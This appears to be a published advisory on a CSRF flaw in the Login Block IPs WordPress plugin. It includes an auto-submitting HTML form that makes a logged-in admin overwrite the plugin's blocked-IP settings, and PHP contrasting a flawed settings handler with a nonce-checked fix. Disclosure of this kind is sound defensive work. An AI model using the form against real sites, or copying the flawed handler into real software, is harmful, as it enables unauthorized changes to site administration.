WordPress Plugin Vulnerabilities

Login Block IPs <= 1.0.0 - Arbitrary Setting Update via CSRF

Description

The plugin does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack.

Proof of Concept

Make a logged-in admin open a page containing the HTML code below.

<form id="test" action="https://example.com/wp-admin/admin.php?page=login-block-ips%2Fadmin%2Fpartials%2Flogin-block-ips-admin-display.php" method="POST">
    <input type="text" name="login-block-ips-form" value="1">
    <input type="text" name="security_code" value="fff">
    <input type="text" name="ip1" value="4.4.4.4">
    <input type="text" name="ipdesc1" value="test4">
    <input type="text" name="ip2" value="">
    <input type="text" name="ipdesc2" value="">
    <input type="text" name="ip3" value="">
    <input type="text" name="ipdesc3" value="">
    <input type="text" name="ip4" value="">
    <input type="text" name="ipdesc4" value="">
    <input type="text" name="ip5" value="">
    <input type="text" name="ipdesc5" value="">
    <input type="text" name="ip6" value="">
    <input type="text" name="ipdesc6" value="">
    <input type="text" name="ip7" value="">
    <input type="text" name="ipdesc7" value="">
    <input type="text" name="ip8" value="">
    <input type="text" name="ipdesc8" value="">
    <input type="text" name="ip9" value="">
    <input type="text" name="ipdesc9" value="">
    <input type="text" name="ip10" value="">
    <input type="text" name="ipdesc10" value="">
    <input type="text" name="ip11" value="">
    <input type="text" name="ipdesc11" value="">
    <input type="text" name="ip12" value="">
    <input type="text" name="ipdesc12" value="">
    <input type="text" name="ip13" value="">
    <input type="text" name="ipdesc13" value="">
    <input type="text" name="ip14" value="">
    <input type="text" name="ipdesc14" value="">
</form>
<script>
    document.getElementById("test").submit();
</script>
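The missing check in the description above, shown as an added illustration that is not the plugin's own code (the plugin's real handler is not on this page): a settings handler that trusts any POST carrying the form marker next to one that ties the form to a WordPress nonce. Function names, the option key and the nonce action are assumptions; the field names follow the PoC form.

```php
<?php
// Added illustration, not the plugin's code: function names, option key and
// nonce action are assumptions; field names follow the PoC form above.
// Vulnerable pattern: any POST carrying the form marker is trusted, so a form
// auto-submitted from an attacker's page by a logged-in admin is accepted.
function lbi_save_settings_vulnerable() {
    if ( empty( $_POST['login-block-ips-form'] ) || ! current_user_can( 'manage_options' ) ) {
        return;
    }
    update_option( 'login_block_ips_blocked', lbi_collect_ips( $_POST ) );
}
// Hardened pattern: the settings form embeds a nonce tied to the action and the
// handler rejects any request without a valid one. A cross-site page cannot
// obtain the victim's nonce, so the forged POST fails before update_option().
function lbi_render_form_hardened() {
    echo '<form method="post">';
    wp_nonce_field( 'lbi_save_settings', 'lbi_nonce' );
    echo '<input type="hidden" name="login-block-ips-form" value="1">';
    echo '<input type="text" name="ip1"> <input type="text" name="ipdesc1">';
    submit_button();
    echo '</form>';
}

function lbi_save_settings_hardened() {
    if ( empty( $_POST['login-block-ips-form'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // Dies with "The link you followed has expired" if the nonce is missing,
    // invalid, or older than the nonce lifetime.
    check_admin_referer( 'lbi_save_settings', 'lbi_nonce' );
    update_option( 'login_block_ips_blocked', lbi_collect_ips( $_POST ) );
}

// Shared helper: keep only well-formed IPs with a sanitized description.
function lbi_collect_ips( array $post ) {
    $rows = array();
    for ( $i = 1; $i <= 14; $i++ ) {
        $ip = isset( $post[ "ip$i" ] ) ? trim( wp_unslash( $post[ "ip$i" ] ) ) : '';
        if ( '' === $ip || false === filter_var( $ip, FILTER_VALIDATE_IP ) ) {
            continue;
        }
        $desc   = isset( $post[ "ipdesc$i" ] ) ? wp_unslash( $post[ "ipdesc$i" ] ) : '';
        $rows[] = array( 'ip' => $ip, 'desc' => sanitize_text_field( $desc ) );
    }
    return $rows;
}
```

The capability check alone does not stop the attack, because the victim admin does have `manage_options`; only the nonce distinguishes a request the admin made from the plugin's own form from one forged by another site.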

Affects Plugins

No known fix

Classification

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Verified
Yes

Timeline

Publicly Published
2022-09-05
Added
2022-09-05
Last Updated
2022-09-05
